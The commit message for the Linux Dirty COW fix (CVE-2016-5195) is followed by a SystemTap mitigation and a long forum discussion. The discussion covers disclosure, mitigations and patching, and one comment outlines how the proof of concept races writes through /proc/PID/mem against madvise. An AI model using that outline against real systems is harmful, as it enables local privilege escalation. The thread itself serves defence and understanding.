mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
get_user_pages() race for write access") but that was then undone due to
problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
In the meantime, the s390 situation has long been fixed, and we can now
fix it by checking the pte_dirty() bit properly (and do it better). The
s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
software dirty bits") which made it into v3.9. Earlier kernels will
have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely
theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
we already did a COW" rather than play racy games with FOLL_WRITE that
is very fundamental, and then use the pte dirty flag to validate that
the FOLL_COW flag is still valid.
And for earlier kernel versions, there is an STAP patch:
1) On the host, save the following in a file with the ".stp" extension:
probe kernel.function("mem_write").call ? {
$count = 0
}
probe syscall.ptrace { // includes compat ptrace as well
$request = 0xfff
}
2) Install the "systemtap" package and any required dependencies. Refer
to the "2. Using SystemTap" chapter in the Red Hat Enterprise Linux
"SystemTap Beginners Guide" document, available from docs.redhat.com,
for information on installing the required -debuginfo packages.
3) Run the "stap -g [filename-from-step-1].stp" command as root.
The link doesn't say what you say it does.
It says that Linus thinks that security researchers want to put security at the expense of usability, which is a different thing entirely.
First you gotta tell me what do you think I'm saying. The link may not say it but if you check the thread that link resides in you'll see it's right on topic.
The context here is set by the parent:
> That sounds like a pretty serious issue with the QA and or bug tracking process.
My comment is exactly about "bug tracking process"
Linux is not known to be a friendly upstream when it comes to widely accepted security procedures like marking security vulnerabilities as such, coordinating fixes with distribution vendors etc.
> So I personally consider security bugs to be just "normal bugs". I don't
cover them up, but I also don't have any reason what-so-ever to think it's
a good idea to track them and announce them as something special. (http://yarchive.net/comp/linux/security_bugs.html)
Just look at the damn commit that fixes this vulnerability. It doesn't even tell it is a serious local privilege escalation. I saw the changelog for 4.4.26 yesterday and didn't realized it was an urgent security update until I saw Debian bulletin later.
Yeah. "various reasons". There are only 2 commits and one is a huge vulnerability. In the mean time the fix (thus the vulnerability) was sitting in Linus' git tree for the last week because Linus doesn't believe in security vulnerabilities.
That, and that a bug is a bug is a bug. Any bug can potentially be a security vulnerability with the right approach. Thus putting people that find such bugs on a pedestal is counterproductive.
How did you prove that it's not also a security problem? Experience shows that there are often surprising ways to abuse what seems to be a benign bug to break security of a system.
The solution is for people to stop using blockquote formatting for text and reserve it for it's intended puprose of quoting code and retaining formatting.
At Appcanary, we're thinking about opening up our vulnerability database to be browsable and searchable by the public. If you're not sure which version has the patch for this vulnerability in your distro, here's what we know:
If you wanted to create a useful tool to promote yourselves you could make something for CentOS that allows a user to apply critical security updates only. yum-security doesn't seem to work on CentOS as the repos don't have the correct meta data. Currently that requires a satellite subscription.
Re Android: No we don't, but I'd be interested to know what we can do with Android to be helpful to you. Send me an email (max at our domain) if you want to talk more.
vulns page: yeesh that is slow. This is the first time I'm sharing our vuln pages outside of our logged-in users, and yeah, that index is definitely not ready for public consumption yet.
Some operating systems like FreeBSD and (I think) Debian have this functionality built in without the need for external service. So it depends on what you are using. RedHat had a similar functionality as well AFAIR.
It's probably the most serious Linux local privilege escalation ever.
Look, the Azimuth people have forgotten more about reliable exploit development than I have ever known, but, no, as stated, this is clearly not true. Not long ago, pretty much all local privesc bugs were practically 100% reliable.
What I think they mean to say is that this is unusually reliable for a kernel race.
I still think, though, that the right mental model to have regarding Linux privesc bugs is:
1. If there's a local privesc bug with a published exploit, assume it's 100% reliable.
2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
You said it: If you are not explicitly on the business of providing external access to your machine, the privesc isn't your problem (it's a problem, and it's bad, though), it's the fact that anybody could exploit the privesc in the first place.
The point is that code execution is almost always remote root, because lots of bugs like this exist. Also: most engineers overestimate the relative value of root vs. simple inside-the-VPC code execution, which is almost always gameover anyways.
Thomas has elaborated on this a few times over the years, but to elaborate for people who weren't around for those conversations: if you can make an HTTP request from inside the firewall, which probably doesn't require root, you can pivot the attack to a variety of internal services which are not designed with security in mind. That could let you e.g. reconfigure networking appliances, grab credentials to internal or external services from DevOps-y credential stores, grab all manner of business secrets, pivot to direct SQL access to the DB laundered through e.g. internal analytics dashboards or admin tooling, etc.
Of course you care about this sort of flaw: you need as many lines of defense as possible. But if anybody can exploit it in the first place, you've already got a major security hole.
> "In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
It depends. I've seen "oh well if someone has rce they probably have root anyway" used way too many times as an excuse to avoid defense-in-depth measures.
Those people might be right. Defense in depth is a legitimate tactic, but that's all it is, and it's often an excuse for people to waste time layering stupid stuff on top of real security controls.
ASLR, NX, and CFI would be an example of a defense in depth stack that is meaningful.
SSH, Fail2Ban, and SPA would be an example of a defense in depth stack that basically just wastes time.
I would be more comfortable with a system where I knew I had to burn the box if I lost RCE on it than I would be with a system that somehow depended on RCE not coughing up kernel, and persistence, to an attacker.
The other thing defense in depth can provide is increased attacker cost. That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.
But if someone has a kernel exploit, probably nothing you've done for defense in depth is going to meaningfully increase costs.
> That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.
A really good example of this is Spyro 3: The developers set up a system of overlapping checksums (which could in turn bet part of the data being checksummed by other, overlapping, checksums) so that it was virtually impossible to change even a single bit without failing the test. It was eventually cracked, as the check only ran at boot time (it required 10 seconds of disk access, and adding 10 seconds to every loading screen in the game would have been unacceptable), which meant it took over two months for pirates to get a crack working (unusual for the time). And since most game sales come in the first two months...
But that's really just me using this as an excuse to share a bit of technical trivia.
I'm confused, how is SSH an example of defense in depth? It is an access method. You should absolutely harden your SSH configuration. Fail2Ban is useless on a properly configured SSH server (no root, no passwords, no kerberos, only keys). Managing the keys at scale, well that is a different story.
I agree with you that ASLR, NX, and CFI are the most important system level defenses to employ.
I suspect that you're confusing fail2ban and port-knocking (or using fail2ban as a port-knocker).
The point of fail2ban is to prevent an attacker from brute-forcing your server. In a key-only config, the chances of getting brute forced is smaller (by a few orders of magnitude) than getting hit by an asteroid and having the server get hit by an asteroid, so fail2ban doesn't really help.
_In theory_, the same would be true for port-knocking.
However, in practice, sshd can have security holes which a malicious scanner could exploit. And while port-knocking doesn't help against a determined attacker (it's subject to MITM, replay-attacks), it does help with defense-in-depth.
That is true and a good use case for fail2ban. Useless was probably a strong word, what I really meant was of limited utility in increasing the security of the SSH service.
The main reason I use fail2ban is I got tired of the log file noise/bloat. I use key-only access on my servers already, with the key stored on a hardware token (Yubikey).
I guess the question then is why you're looking at failed Auth logs. Failed auths are boring, doubly so on a key only server. Successful auths are where the fun is at.
When I first set up fail2ban it was because I got annoyed that the machine on my desk was making regular "clunk...clunk...clunk" noises from the hard disk as it wrote another failed-auth attempt to the log every second or so...
Not entirely reasonable for all use cases. If there's a machine that you need access to from many different locations, a keyfile is more of a PITA than a long passphrase.
A HPC center (that is, lots of users coming in via ssh) I know about disabled key logins IIRC due to some incident where an attacker had got hold of a password-less key.
Too bad that sshd can't enforce use of password-proctected keys on the server side..
You got the thing backwards. It's not "too bad that sshd can't enforce keys"
of some property that happened to be missing in the key attackers got their
hands on. It's "too bad the HPC center staff didn't have tools good enough to
manage their servers". CFEngine and Puppet being two examples of such tools
the staff missed (or didn't know how to put into use in this case).
The problem, AFAIU, was that some user had a password-less key stored on some external system (their personal home computer, for all I know). That system was hacked, and allowed the attacker to access the HPC system. I don't see how the HPC center staff getting the Puppet-gospel could have prevented that person from using a password-less key. Well, except by disabling key-based logins (which, AFAIU, they could have used Puppet/cfengine/whatever for).
My point is that in general it would be better to disable password auth and only use key based auth, but only if you could somehow guarantee that the users wouldn't do crazy things like use password-less keys. But as you can't do that on the server-side, what other options do you have?
Control-Flow Integrity.
It's a bit of the new hotness in exploit mitigation, however it's quite complicated and there are various solutions that have different advantages and disadvantages.
clang docs:
http://clang.llvm.org/docs/ControlFlowIntegrity.html
Shorter CFI: when doing codegen for calls through function pointers (which will involve indirect calls through registers), emit extra code to make sure the register being jumped to is a legit function, thus breaking ROP payloads.
It's always a matter of increasing attacker cost. I am not sure that attacking QEMU, then finding a privilege escalation on the host that can break out of SELinux is much easier than just staying in the VM, hopping through the internal network until you find a host that lets you do what you want.
Chances are what you want is "simply" access to a shared folder rather than root.
1. Most users won't be affected by all the exploits (you don't stuff in a VM all models of network cards, SCSI controllers, etc)
2. Many deployments of QEMU (through Xen or Libvirt) are protected by AppArmor/SELinux. This would at least forbid access to /proc/self/mem but I can't say if this is enough to prevent evasion. IMO, this is likely to make the task quite harder.
To be fair, Docker now defaults to using AppArmor and seccomp too. And the defaults seem to be not completely toothless either (I had to "disable" seccomp to get things running multiple times. For example, you can't just ptrace() in a container.)
Well another thing to keep in mind with this one in particular is that there is no way to mitigate it. grsecurity can't help with this kind of bug, nothing can so it may not just be about reliability of this exploit but the fact that there's no mitigation other than to update.
It's sad actually that this is the perfect type of exploit to block with SElinux, a simple write to unauthorized files. But since no one uses the user contexts of selinux then no one blocks this.
Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
So this exploit will run unconfined and will be allowed writes everywhere on the system.
I once tried the staff_r role on a Fedora 23 system and it worked out of box but there were more errors and it would not be recommended for beginners.
I believe the same goes for apparmor since apparmor only defines "armor" for processes, not for users. How many use pam_apparmor today? [1]
>Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
Just to clarify this, any process you start from the shell. Like the PoC exploit.
But in an actual scenario, if the exploit were launched from Firefox, or Nginx, it would run under a confined context and be prevented from overwriting most critical system files.
> Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.
I am actually surprised that sane and safe defaults are ignored and left to user's discretion. Most users think Linux is secure by default.
It's interesting to see Windows going into other direction and locking down more and more by default.
Yes, it is ironic that Windows and macOS are the desktop systems taking this route, while GNU/Linux is starting to look like the swiss cheese many FOSS used to joke the other OSes for.
The scale is so high, that kernel security has become a major discussion subject.
Well it's an ongoing effort in Fedora too. Every release of fedora or centos show some improvement around the user of SElinux.
I only wish I had the competence to help out because I think it's a very important effort.
Sad to say that in Fedora 23 I was able to easily put my user into the staff_r role, and thereby confining it. But in fedora 24 there seem to be only three default user contexts defined. Not sure what happened but that likely means I have to define my own user context and then I can't know how well supported it is in the policy.
It's impossible for ordinary users to do any of this.
I agree. There have been far easier local exploit in the past. For example CVE-2006-2451 whose exploitation was quite simple and not using any race condition. Also CVE-2009-2692 or CVE-2010-3049. Browsing exploit-db makes it easy to find them.
Yup, the best solution here is to make privesc ineffective via VM isolation. Privilege escalations are rampant on most operating systems, they're not worth relying on. VM isolation breaks are much rarer.
> 2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.
I think this goes for any mainstream OS, Linux is not particularly special here.
So basically, if you wouldn't give a user sudo, they shouldn't have login access at all? Certainly works for some scenarios, but not practical for many others.
It depends on why you wouldn't give a user sudo. If you're worried that they might get bored and do an immature prank, or do something ill-advised (like changing the root password, or giving sudo to someone else) and render the system insecure/inoperable/unmaintainable, you probably can give them shell access. A good example here would be giving shell access to employees or the like, if their job is aided by it. The time and effort it takes to research a privesc vuln is usually sufficient to deter them, and if it isn't, you just revoke access and fire them if they do it.
If you're worried that someone might be trying to deliberately compromise your security, you can't give that person the ability to run code on your system.
>However that's hard to do when the vast majority of kernel bugs come from vendor drivers, not the upstream Linux kernel, Stoep said.
Doesn't this actually validate Andrew Tannenbaum's argument[1] over 25 years ago when he said monolithic operating systems are inherently insecure and a rethink is required.
While it's true that vendor drivers living in kernel space is horrible for security... that's somewhat offtopic here. This particular bug is in the memory management system, which is one of those things that kind of has to be in the kernel. A microkernel architecture seemingly would not have helped in this particular case.
A privilege escalation in MM daemon would still allow you to write and read any user memory.
Just not kernel memory or execute anything not covered by memory access capabilities. For nearly all intents and purposes, it is root.
Firstly, as the MM daemon runs on its own process and is well-separated from other code, it is far easier to audit, debug and so on. Its interface is also entirely explicit. There's value in modular programming. It's far more reasonable to expect quality from such a MM daemon than the mess in a random monolith kernel.
Secondly, in seL4, physical pages are capabilities. There might be more than one MM daemon, owning separate sets of capabilities to physical pages. Security-critical memory might be managed by a MM daemon your vulnerable process has no capability to talk to.
seL4 does not have these kinds of errors. By shrinking the TCB, you make it possible to do hardcore verification. The challenge is in extending to larger systems and composition.
Yeah not sure what happened. Somehow I ended up looking at wrong article.
I am not very good at theory of Operating Systems but since Memory Management is separated from kernel it would have been difficult for a memory bug to impact other subsystems.
Another argument is modularity which would have allowed better testing hence lesser chances of bugs.
Yep but my argument still holds true especially in the era of IoT risks are now becoming physical. Bugs earlier used to only impact people financially, emotionally but now risks are physical.
Those projects had to constrained themselves to having 100% of the code available, no binary libraries and lock the compiler versions being used.
Since the early 90's I keep hearing that it is possible to write safe C code, yet outside in the real world, unless constrained by processes like MISRA-C and Frama-C, which isn't really C anymore, it never works.
The proof is the amount of CVE exploits, that get reported almost daily!
Just yesterday while reading some papers on Cyclone, I discovered this jewel:
"X El Capitan v10.11.6 and Security Update 2016-004" release notes
A shame, considering Apple actually has the resources for doing a proper rebase of XNU on L4 and with actual pure microkernel multiserver architecture.
haha, that safety stuff is just training wheels. You can't delegate security. Even if you use some baby-proof "programming language", as a security engineer you still have to verify that the safety works in the condition(s) you're programming for.
Ahah, I was doing systems programming in Pascal dialects and Modula-2 before having to know C was a requirement.
Of course one always has to validate security, but with C each line of executable line of code is a possibility exploit, which grows exponentially with the amount of developer touching the code and their respective skills and UB knowledge.
CVE-2016-5195
This flaw allows an attacker with a local system account to
modify on-disk binaries, bypassing the standard permission
mechanisms that would prevent modification without an
appropriate permission set. This is achieved by racing the
madvise(MADV_DONTNEED) system call while having the page of
the executable mmapped in memory.
Excellent example why mounting partition with system binaries (such as /usr) read-only is a good idea. CoreOS does this.
Man, MADV_DONTNEED again? I mean, Linux's implementation is already weird (it behaves in a way counter to most other implementations of the call: you can see Bryan Cantrill's talk for the details).
Bryan, if you're reading this, it's merely because I doubt that you actually check Linux bugtrackers.
Also, GNU tail provides tail -F, which does what you want tail -f to do. There is a reason for this. I don't remember what it is, but I think the manpage talks about it.
-F vs -f: -F figures out the new inode if the file is deleted (*notify are inode-based, if you see DELETE_SELF for a file you'll never get any more events)
It's because IN_MODIFY covers both writing and truncation, so the code path for such an event has to handle both anyway.
Ironically, given that you mention M. Cantrill, GNU tail does not really handle truncation properly, and gives up for almost the very case that M. Cantrill did: when the truncation doesn't decrease the size, or is very closely followed by a write that ends up not decreasing the size.
Of course, truncation is not the best way to organize writing log files in the first place. daemontools family style log management (in cyclog, multilog, et al.) starts a fresh file whenever there is a rotation, so these problems of truncation never arise.
What I was actually referring to was Cantrill's talk about tail -f on Solaris, and how he improved it (so that it at least handled some cases). He looked at the GNU behavior, and determined that truncation was noted, but nothing was done about it. This is true if you use -f. However, if you use -F, truncation is handled properly.
I know what you were referring to. It has already been hyperlinked; I had already referred to where M. Cantrill explained that he gave up; and as I have just explained, the people who wrote GNU tail gave up in the same way (for much the same reasons, I expect) and GNU tail does not handle truncation any more properly than M. Cantrill did. There's no doco, but there's commentary in the code observing the problem.
And as I then went on to explain, this whole idea of truncating one log file over and over is a poor one, and not the best way to do logging in the first place. So the fact that both M. Cantrill and the GNU people gave up should perhaps be viewed as stopping when an inferior mechanism is pushed beyond its limits.
As others have pointed out, mounting read-only wouldn't have helped here.
What would have helped:
* Block ptrace() syscall using seccomp.
* Don't mount /proc, or mount it read-only.
As I understand it, those steps would close all attack vectors for this bug.
FWIW, the Sandstorm.io sandbox blocks ptrace() and doesn't mount /proc at all, so I think the bug has never been exploitable by Sansdtorm apps. (Disclosure: I am the tech lead of Sandstorm.)
I think Docker now defaults to mounting /proc read-only and blocking ptrace(), so it may mitigate this vulnerability as well, but I'm not 100% sure about that.
No, it's more complicated than that. You need one process to mmap a file, and then you need a second process to be writing into the first process's address space while the first process triggers the COW. You can't do it with one process attacking itself.
Update: We talked to Andy Lutomirski who was involved in reverse-engineering the original exploit and tracking down the bug. He says the code path is not triggered by regular memory writes; you have to go through ptrace() or /proc/self/mem. Details in this blog post:
Of course, if you have evidence to the contrary, we'd all like to know about it!
(You are technically correct that the writes can come from another thread rather than another process, but the important part is that it has to go through one of those interfaces.)
> Please note that this mitigation disables ptrace functionality which debuggers and programs that inspect other processes (virus scanners) use and thus these programs won't be operational.
> The in the wild exploit we are aware of doesn't work on Red Hat Enterprise Linux 5 and 6 out of the box because on one side of the race it writes to /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise Linux 5 and 6.
Is everyone barking up the wrong tree here?
EDIT: All of the PoCs here use ptrace() or /proc/self/mem. Why would they do that if they didn't need to?
I just talked to amluto who explained that the race can only be triggered by a write that uses the "force" flag to get_user_pages() (a kernel function). /proc/pid/mem and ptrace() do this but regular writes and process_vm_writev() do not.
This exploit doesn't write to disk at all. It's about modifying the in-memory datastructures that correspond to executables on disk in between when they're read and executed.
I don't think that prevents this error. This exploit is all about gaining read-write access to a read-only page of memory. Mounting as read-only Might prevent the error, but only through extra checks of the dirty bit before pages are used (IE. The kernel would have to check the dirty bit on every page of a read-only file to ensure the contents were not changed through an exploit).
The state of the disk and mounting of the disk generally wouldn't matter because the page is already being forced from read to read/write, and that has no barring on the mounting of or data on the actual disk. It doesn't matter if this data is actually flushed to the disk as long as the kernel uses it from cache without noticing it has been changed (Which it probably doesn't check regardless of read-only status).
Does this actually allow modifying the binary on disk, or just modifying the in-memory cached page? (i.e., is this a persistent attack that survives a reboot?)
Fwiw, you should never think about an OS in terms of what security features they have enabled by default. The OS is almost always designed to help the user use programs and to help programs run. Just assume it is not secure until you do an audit + lockdown yourself.
If you want a secure system by default, you should probably not use Linux. I would go with OSX or OpenBSD to start.
(And finally: mounting /usr read-only isn't actually a security feature, because if you can exec code you can run a privesc and remount /usr read-write; mounting as noexec could arguably be considered a security feature)
Gotta love the dedication with the Dirty COW "swag" web shop and all. Though something tells to me it's just a strange in-joke. Might be the prices? ($1,000 for a mouse pad .. oh, really?)
It would appear that the creators of the web site are not even affiliated with the people who found or fixed the bug.
"Dirty COW is a community-maintained project for the bug otherwise known as CVE-2016-5195. It is not associated with the Linux Foundation, nor with the original discoverer of this vulnerability. If you would like to contribute go to GitHub."
Whenever I see something being sold for outrageous amounts of money (like some book on Amazon which can be bought new for $40, but some people are selling used for $1400) my first suspicion is: money laundering.
it's definitely a joke. everything in the store is overpriced, FAQ item "how can I uninstall linux" links to a video of a guy smashing a computer, etc. look at this FAQ item:
What's with the stupid (logo|website|twitter|github account)?
It would have been fantastic to eschew this ridiculousness,
because we all make fun of branded vulnerabilities too, but
this was not the right time to make that stand. So we
created a website, an online shop, a twitter account, and
used a logo that a professional designer created.
I think the author is just snarking about either branded vulnerabilities or the hype that this issue is getting. or both?
Okay, I have no idea what to do. Not a security engineer, can't follow what this thing does but I do have a couple of VPS's running my blog and a few other things. Now maybe there's an argument that I shouldn't be doing this if I don't completely understand all the ins and outs, but what the hell, I like learning about Linux.
So my question is: is simply updating and upgrading enough to protect me from this MOST DANGEROUS BUG EVER IN THE WORLD OH MY GOD YOU'RE GOING TO END UP PART OF A BOTNET AND HURT LITTLE CHILDREN!!1!!1! Which is how this reads to even a semi-technical reader, I mean I know my way around the command line but I'm at a loss as to what to do here.
Since for any serious bug that's published, there's very likely a dozen private or not-yet-found, and also considering on how many networked devices the linux kernel is used, I would really like to see a better upgrade story for Android devices and any other linux-inside gear which doesn't have a distro package manager to apply the fix. As little as I like obstructing tech companies with more laws, especially since most laws don't understand the tech, I feel like laws are the only pressure we can hope for. This is why the abuse of IoT devices is a good thing. It will highlight how dangerous it is to slap a random linux version in some device and never bother with updates. A fleet of smart tvs needs to be hijacked with a stalker trojan that is then used by people to record and later post online private moments of unsuspecting owners of always standby smart tv, amazon echo networked microphones, etc. It's just how the world works before it realize the risks and does something about it.
As an engineer you can argue and plead with management to not release something that you don't intend to provide timely updates with a well-communicated support time. Like a 2 year warranty that's prominently communicated, this would highlight to consumers that it's unsafe to use the device unless disconnected from the network. Just like a car that doesn't pass your local safety regulations is not allowed into public traffic.
Actually, I'm surprised modern cars do not require periodic zero-expenses-for-the-owner software updates at licensed dealerships. You can explain to a driver that tires go bad because they drove X miles and have to be paid for, but you cannot argue that software updates need to be paid for because from the time they bought it Y days have passed. Take the Samsung battery optimization that went wrong, where the separation layer was a tiny bit too shallow. It's fair to assume some regulation will follow for safety purposes. Similarly, networked devices, which are not (and cannot be?) microcontrollers with mere 500 lines of code, have to be regulated in terms of software updates.
Now you may say the industry will go broke if they're required to provide upgrades, or less devices will be made, but I think this will lead to consolidation of the software stack, which is mostly a good thing, as those who want to produce dozens of cheap IoT devices can do so without hiring kernel developers. It's like other industries where cheap toy makers source materials like plastic from vendors, knowing it's safe, or create the materials following a detailed recipe which is certified.
That's assuming the distributor warranted you against vulnerabilities in his product (and I remember seeing a "Distro X GNU/Linux comes with ABSOLUTELY NO WARRANTY" on every device I've used...). Forcing said warranty is preposterous.
Concerning smartphones there are so many privacy and security issues that are far easier to exploit than something that involves kernel hacking... But anyway, isn't Google rolling out security updates for Android? I use CM and I know they don't. There are projects like Replicant which provide a mostly free distribution, but I don't think they're rolling out security updates either. If you're interested maybe contact them?
Are the system (not app) updates Google releases applicable to all Android devices?
It's true that there are a high number of bugs available just in mobile browsers, which do receive google play updates, if you have google play, but viewing the underlying code as verified to be correct would be naive.
If I know that a smart phone or smart fridge will not get software updates and be substantially limited in functionality by that, I wouldn't pay more than 100 bucks for it, because I expect to buy another one in probably 14 months.
However, if the update problem would be fixed properly, I wouldn't mind paying a premium.
It seems that this isn't just laziness by the vendors but also calculated into nudging customers to buy new appliances and gadgets although the hardware is capable and perfectly fine. No vendor would admit to that, but this is being investigated and called planned obsolescence. If the price would reflect the artificially limited lifespan of a device, then the problem goes away, and it's just a matter how much of the materials gets recycled.
Can someone help me better understand how this works, or perhaps point me to a decent article explaining more of the details? Most of the articles I can find just briefly explain the exploit, but not really how it works (in detail).
From looking at the example code, it seems like the general process is:
- Open some (normally un-writable) file as read-only and mmap it in to your process.
- Kick off two threads. One thread to repeatedly write to the same mmap-ed address via /proc/PID/mem and another thread to keep issuing the madvise call.
- Wait for some race condition to be (un)satisfied such that you're able to write to a cached copy of the file.
What I don’t fully understand is how the /proc/PID/mem thing works.
Here’s what I’m curious about:
1. What would happen if you tried to write to the mmap-ed region directly? Since it’s been mapped in with “PROT_READ”, does this mean that you’ll get a segmentation fault or something? From the manpage, it seems like “MAP_PRIVATE” allows it to be a COW mapping, but I don’t see how the combination of “PROT_READ” and “MAP_PRIVATE” is even valid. Unless this means that any writes to data copied from the mmap-ed region into other buffers will be COW-ed and that you can’t actually write to the mmap-ed region itself? That would make sense to me.
2.How is writing to /proc/PID/mem any different than writing through the mmap-ed region directly? Assume that you weren’t running the madvice thread. What would happen then if you tried to write to the /proc/PID/mem file? Presumably the same thing that happens if you just tried to write to the file directly…
3. Finally, how does the madvice call cause a race condition? I realize this might be a little too much to cover in a comment, but this seems like the meat of it.
Doesn't seem like it works on a $10 DigitalOcean droplet (1 vCPU) with grsec-patched 4.4.8. After running for quite some time (which I suspect a system administrator would notice) "cat foo" still outputs the same contents.
If I'm reading this correctly it works only when there's already access to a user account on the system. So you need to have an existing vulnerability already [eg an untrusted user].
Interesting whether it will give new root exploits for Android as suggested in the comments.
If one's running an LTS version of Ubuntu like 14.04 or 16.04, can one can expect to get an update with the security patch for this?
I'm running Kubuntu 14.04 with the latest security updates, and I'm still on kernel version 3.13.0-98-generic.
~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
~ $ uname -a
Linux anon-pc 3.13.0-98-generic #145-Ubuntu SMP Sat Oct 8 20:13:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
No idea why I haven't gotten an update to 4.x. Should I just switch to a rolling release distro like Arch to have the latest updates of everything?
It looks like my kernel updates are being held back:
~ $ sudo apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages have been kept back:
ffmpeg libva1 linux-generic linux-headers-generic linux-image-generic
0 upgraded, 0 newly installed, 0 to remove and 6 not upgraded.
The newest available version of linux-image-generic according to apt-cache showpkg is 3.13.0.100.108. (I'm running 3.13.0.98 right now.) Maybe 3.13.100 has the fix to this bug, but I'll have to figure out what's keeping back linux-kernel-image from being updated.
What's really puzzling though is that I should have kernle 4.4.x, since I'm running Ubuntu 14.04.5, according to the Ubuntu Wiki: https://wiki.ubuntu.com/Kernel/Support#A14.04.x_Ubuntu_Kerne... It's strange that my Kubuntu installation is frozen on 3.13.x.
Note the "HWE" (hardware enablement) on that chart. Ubuntu 14.04 came with 3.13; if you want a 4.4 kernel, you have to install linux-generic-lts-xenial.
Thanks, that answers my question! Installing linux-generic-lts-xenial should let me get the 4.4.x kernel on Ubuntu 14.04.
I might still switch to Arch Linux. It's been a hassle to get the latest releases of various packages (like python, gcc, etc). I've had to use third-party PPAs or manually install them. Ubuntu's freezing of packages makes it great as a base image for Docker containers and other reliably reproducible deployment scenarios, but that's not so great as a regular desktop user.
I have been using Antergos (Desktop friendly Arch) on and off for a while. If you haven't updated for a while, it could cause problems. After I updated after staying off it for two months I had an x crash. Restarted, no problems, all updates installed.
Chris from LAS does say I believe in User Error 6 or 7 that if you don't update Arch in a while you could have stability issues when you update.
This is indeed a point of confusion. dist-upgrade basically allows adding new packages, or removal of old packages. upgrade does not, this includes the versioned kernel packages. I suspect (possibly unfoundedly) that the command was originally named because this generally happened when doing such distrubution upgrades, but it's not what it actually does.
If you're always reviewing it manually it's ok to just use dist-upgrade, alternative if you want to install new packages but still not let it remove packages, you can use:
sudo apt-get upgrade --with-new-pkgs
Personally I always just use dist-upgrade and it's not a problem as long as you check it before you hit go.
Sorry, instead of "upgrade" I should have typed `full-upgrade` (which is the same thing as `dist-upgrade` and is unrelated to moving major distro versions)
I've set up cron jobs in the past which automatically ran apt-get update && apt-get upgrade, but it's sometimes caused things to unpredictably break, especially when you have the backports PPA.
After things randomly broke 3 times I decided not to add the backports PPA, and to do manual updates every now and then.
Set up the `unattended-upgrades` to only install security updates, blindly apt-upgrading can lead to unintended consequences; this will let you get security upgrades without breaking 3rd party packages.
The github page [0] states that "The In The Wild exploit relied on using ptrace."
Now, I'm wondering what purpose ptrace serves, aside from debuggers? Why don't we just disable this by default on production systems (where you shouldn't be debugging anyhow)?
> production systems (where you shouldn't be debugging anyhow)
I'm not sure about this. Ideally, yes, but if you don't know what's causing an issue it can be difficult to reproduce it, and strace can be phenomenally helpful in figuring out the cause. Of course, you could leave it off until you think you might be in such a situation.
There are a surprising number of users for ptrace. E.g. upstart uses it to count forks (presumably to mitigate fork bombs), as geofft has pointed out above.
See the SELinux boolean "deny_ptrace", and/or the sysctl "kernel.yama.ptrace_scope", and have at it.
It's not just for debugging, but for any tool that needs some measure of process control. Probably the next most common ptrace-caller I know is "strace".
So the escalation is rw access to privileged files, are LXC and Docker container breakouts prevented then? Also does /proc access through lxcfs or Docker's handling of /proc make any difference?
Theoretically, no. LXC or docker will not help against this. Not even against this particular exploit seen in the wild, but that could be mitigated with lxc (maybe docker), partically lxc.container.conf you can set seccomp to drop ptrace syscall which this wild exploit depends on.
Here, it really is a difference between VM and container though.
It might protect against the current in-the-wild exploit. It sounds like it modifies a binary/library so if the container doesn't share binaries/libraries with other containers or the root namespace then you are fine. (well fine in the sense that there is no privilege escalation from the container to outside the container or across into another container.) However, there are other interesting read only pages that are shared by everyone that might be targeted (VDSO?).
commit 89eeba1594ac641a30b91942961e80fae978f839 Author: Linus Torvalds <torvalds@linux-foundation.org> Date: Thu Oct 13 13:07:36 2016 -0700